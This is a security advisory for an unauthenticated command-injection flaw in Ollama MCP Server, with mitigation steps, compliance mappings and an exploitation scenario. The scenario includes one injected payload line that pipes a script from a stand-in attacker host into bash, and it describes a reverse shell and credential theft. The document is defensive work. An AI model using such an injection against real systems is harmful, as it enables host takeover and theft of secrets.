CVE-2025-15063

UNKNOWN
Published January 23, 2026
CISO Take

Unauthenticated remote code execution in Ollama MCP Server via OS command injection (CWE-78) — an attacker with network access needs zero credentials to own the host. Any AI agent infrastructure running Ollama with its MCP server exposed is at critical risk right now. Immediately restrict network access to Ollama MCP Server to localhost or trusted subnets, and apply the vendor patch as soon as it is available.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. IMMEDIATE: Identify all Ollama MCP Server instances in your environment — check for processes listening on default ports and any Docker/container deployments.
  2. Restrict network access: bind Ollama MCP Server to 127.0.0.1 or enforce firewall rules that allow only trusted source IPs.
  3. Apply least privilege to the Ollama service account — it should not have access to credential stores, cloud IAM roles, or sensitive filesystems.
  4. Apply the vendor patch (ZDI-26-020) immediately upon release; monitor the Ollama GitHub repo and the ZDI advisory for patch availability.
  5. Detection: monitor for anomalous child processes spawned by the Ollama process (especially shells, curl, wget, base64), and alert on outbound connections from the Ollama service account.
  6. If MCP server functionality is not actively required, disable it until patched.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system
Article 9(2) - Risk management system for high-risk AI systems
ISO 42001
A.6.1 - AI risk management
A.8.4 - Security of AI systems
A.9.2 - Operational security for AI systems
NIST AI RMF
MANAGE 2.2 - Mechanisms to sustain value and manage AI risks
OWASP LLM Top 10
LLM03:2025 - Supply Chain
LLM06:2025 - Excessive Agency
LLM07 - Insecure Plugin Design

Technical Details

NVD Description

Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27683.

Exploitation Scenario

An adversary scans internet-facing IP ranges for exposed Ollama MCP Server endpoints (common in dev/lab environments left accessible). They craft a malicious tool invocation request targeting the vulnerable execAsync method, injecting a payload such as '; curl https://attacker.com/implant.sh | bash' into the user-controlled string parameter. Because no authentication is enforced, the payload executes immediately as the Ollama service account. The attacker establishes a reverse shell, then enumerates environment variables for LLM API keys (OpenAI, Anthropic), cloud credentials, and RAG database connection strings — subsequently exfiltrating model artifacts and pivoting to connected AI infrastructure.

Weaknesses (CWE)

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Timeline

Published
January 23, 2026
Last Modified
January 26, 2026
First Seen
January 23, 2026